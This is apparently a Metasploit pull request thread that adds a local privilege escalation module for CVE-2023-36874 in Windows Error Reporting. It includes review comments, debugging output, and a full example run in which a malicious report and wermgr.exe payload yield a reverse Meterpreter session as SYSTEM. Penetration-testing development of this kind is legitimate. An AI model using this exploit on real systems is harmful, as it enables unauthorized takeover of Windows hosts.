Add Module for CVE-2023-36874, Windows Error Reporting

[bwatters-r7]

This is a draft placeholder for the LPE CVE-2023-36874 that I'm working on.
This module adds an exploit targeting CVE-2023-36874, a directory traversal vulnerability in Windows 10. This module works with Windows 10x64 22H2.

Closes #18303

[h00die]

.cpp.cpp file?

[bwatters-r7]

.cpp.cpp file?

I'm old and confused, and when VS asks for a filename, I still assume it wants an extension. 😆 I'll fix it.

[bwatters-r7]

This is now pretty close. I still need to:

• Document
• Add @Octoberfest7 to authors and references
• Check to see if I can munge the wer file to make it a bit more stealthy.

[cdelafuente-r7]

Thanks @bwatters-r7 for this module! I left a few comments for you to review when you get a chance. I'll start testing now.

[cdelafuente-r7]

We might want to use EXECUTE_DELAY datastore option instead of an hardcoded value. I'm wondering if it is useful to have two sleep call, one before calling upload_execute_exploit in exploit and here. Maybe we could just have one here?

[bwatters-r7]

Thanks for the review! I'm working on getting it to take arbitrary report values, and it was working earlier, and then it quit working. I'm going to need another day to sort out what's going on.

[cdelafuente-r7]

Thanks @bwatters-r7 for updating this. I just left a few last comments before it lands. I tested against Windows 10 22H2 build 19045.2006 and it works great!

That said, I noticed two issues when the module tries to cleanup the directories registered by mkdir.

1. The path passed as argument is a reference to the string variable wer_archive_dir and it is stored in the @dropped_dirs instance variable by register_dirs_for_cleanup. As a result, @dropped_dirs will contain multiple references to wer_archive_dir with the same path:

From: /home/msfuser/metasploit-framework/lib/msf/core/exploit/file_dropper.rb:91 Msf::Exploit::FileDropper#on_new_session:

    86:         file_dropper_deleted?(session, file, exists_before)
    87:       end
    88:     end
    89:
    90:     require 'pry';binding.pry
 => 91:     @dropped_dirs.delete_if do |dir|
    92:       if file_dropper_check_cwd?(session, dir)
    93:         print_warning("Attempting to delete working directory #{dir}")
    94:       end
    95:
    96:       exists_before = file_dropper_exist?(session, dir)

[1] pry(#<Msf::Modules::Exploit__Windows__Local__Win_error_cve_2023_36874::MetasploitModule>)> @dropped_dirs
=> ["C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\IDGuqJrRzs",
 "C:\\wFlEfPpE\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\",
 "C:\\wFlEfPpE\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\",
 "C:\\wFlEfPpE\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\",
 "C:\\wFlEfPpE\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\",
 "C:\\wFlEfPpE\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\",
 "C:\\wFlEfPpE\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\",
 "C:\\wFlEfPpE\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\IDGuqJrRzs",
 "C:\\wFlEfPpE\\system32"]

Only C:\wFlEfPpE\ProgramData\Microsoft\Windows\WER\ReportArchive will be properly cleaned up. I don't think it is an issue with your module, but rather a change that needs to be done in register_dirs_for_cleanup. Probably something like this:

  def register_dirs_for_cleanup(*dirs)
    @dropped_dirs += dirs.map(&:clone)
  end

I'll put a PR up for this.

2. The other issue is this error after the session pops up:

[-] Failed to delete C:\wFlEfPpE\system32: stdapi_fs_delete_dir: Operation failed: The directory is not empty.

This is probably due to the fact that C:\wFlEfPpE\system32\wermgr is still running on the target. I'm not sure how to fix this. Maybe printing a warning that instructs the user to migrate to another process and execute rmdir C:\\wFlEfPpE manually?

[cdelafuente-r7]

Please, could you address the issues reported by msftidy_docs.rb?

ruby tools/dev/msftidy_docs.rb documentation/modules/exploit/windows/local/win_error_cve_2023_36874.md

[bwatters-r7]

@cdelafuente-r7 Thanks for the review- to try and clean things up more, I:

1. Added a printout suggesting that the user may need to manually delete the directories containing the payload, as they will fail to delete automatically if we get a session. I also added guidance about this to the documentation.
2. Added a quick check to make sure the user is not in the admin group (this module will fail if they are) and added a note to the documentation.
3. Added a standard check to make sure the user is not already system.
4. Removed the verify method since it did not really do anything anymore.
5. Updated the cmd_exec call to have nil as the second cmd_exec parameter. I realized I'd removed the second parameter when I added all the arguments to the first parameter. Wooops!
6. Cleaned up the docs to make them pass tests.

[cdelafuente-r7]

Thank you @bwatters-r7! I just noticed the Options section does not follow the documentation template, but I will ninja commit this simple fix myself when it lands. I thought msftidy_docs.rb would have caught this. Other than that, it looks good to me now. I tested against Windows 10 22H2 build 19045.2006 and verified I got an elevated session.

• Example output

msf6 exploit(windows/local/win_error_cve_2023_36874) > exploit verbose=true session=1 lhost=192.168.100.1 lport=4445

[*] Started reverse TCP handler on 192.168.100.1:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[*] OS version: Windows 10+ Build 19045
[+] The target appears to be vulnerable.
[*] Shadow Path = C:\PucoaOJc
[*] C:\ProgramData
[*] Creating C:\ProgramData\Microsoft\Windows\WER\ReportArchive\zOUPEczuvroMKV
[*] Creating directory C:\ProgramData\Microsoft\Windows\WER\ReportArchive\zOUPEczuvroMKV
[*] C:\ProgramData\Microsoft\Windows\WER\ReportArchive\zOUPEczuvroMKV created
[*] Writing Report to C:\ProgramData\Microsoft\Windows\WER\ReportArchive\zOUPEczuvroMKV\Report.wer
[*] Creating directory C:\PucoaOJc
[*] C:\PucoaOJc created
[*] Creating directory C:\PucoaOJc\ProgramData\
[*] C:\PucoaOJc\ProgramData\ created
[*] Creating directory C:\PucoaOJc\ProgramData\Microsoft\
[*] C:\PucoaOJc\ProgramData\Microsoft\ created
[*] Creating directory C:\PucoaOJc\ProgramData\Microsoft\Windows\
[*] C:\PucoaOJc\ProgramData\Microsoft\Windows\ created
[*] Creating directory C:\PucoaOJc\ProgramData\Microsoft\Windows\WER\
[*] C:\PucoaOJc\ProgramData\Microsoft\Windows\WER\ created
[*] Creating directory C:\PucoaOJc\ProgramData\Microsoft\Windows\WER\ReportArchive\
[*] C:\PucoaOJc\ProgramData\Microsoft\Windows\WER\ReportArchive\ created
[*] Creating directory C:\PucoaOJc\ProgramData\Microsoft\Windows\WER\ReportArchive\zOUPEczuvroMKV
[*] C:\PucoaOJc\ProgramData\Microsoft\Windows\WER\ReportArchive\zOUPEczuvroMKV created
[*] Writing bad Report to C:\PucoaOJc\ProgramData\Microsoft\Windows\WER\ReportArchive\zOUPEczuvroMKV\Report.wer
[*] Creating C:\PucoaOJc\system32
[*] Creating directory C:\PucoaOJc\system32
[*] C:\PucoaOJc\system32 created
[*] Writing payload to C:\PucoaOJc\system32\wermgr.exe
[*] shadow_path = PucoaOJc
[*] Exploit uploaded to C:\PucoaOJc\UxJyCBanFmTCAW.exe
[*] Sending stage (200774 bytes) to 192.168.100.200
[+] Deleted C:\ProgramData\Microsoft\Windows\WER\ReportArchive\zOUPEczuvroMKV
[*]
[!] Manual deletion of C:\PucoaOJc may be required
[+] Deleted C:\PucoaOJc\ProgramData\Microsoft\Windows\WER\ReportArchive\
[*] Meterpreter session 2 opened (192.168.100.1:4445 -> 192.168.100.200:49783) at 2023-09-27 10:37:51 +0200
[-] Failed to delete C:\PucoaOJc\system32: stdapi_fs_delete_dir: Operation failed: The directory is not empty.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-UUQE0B4
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

[cdelafuente-r7]

Release Notes

This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10x64 22H2.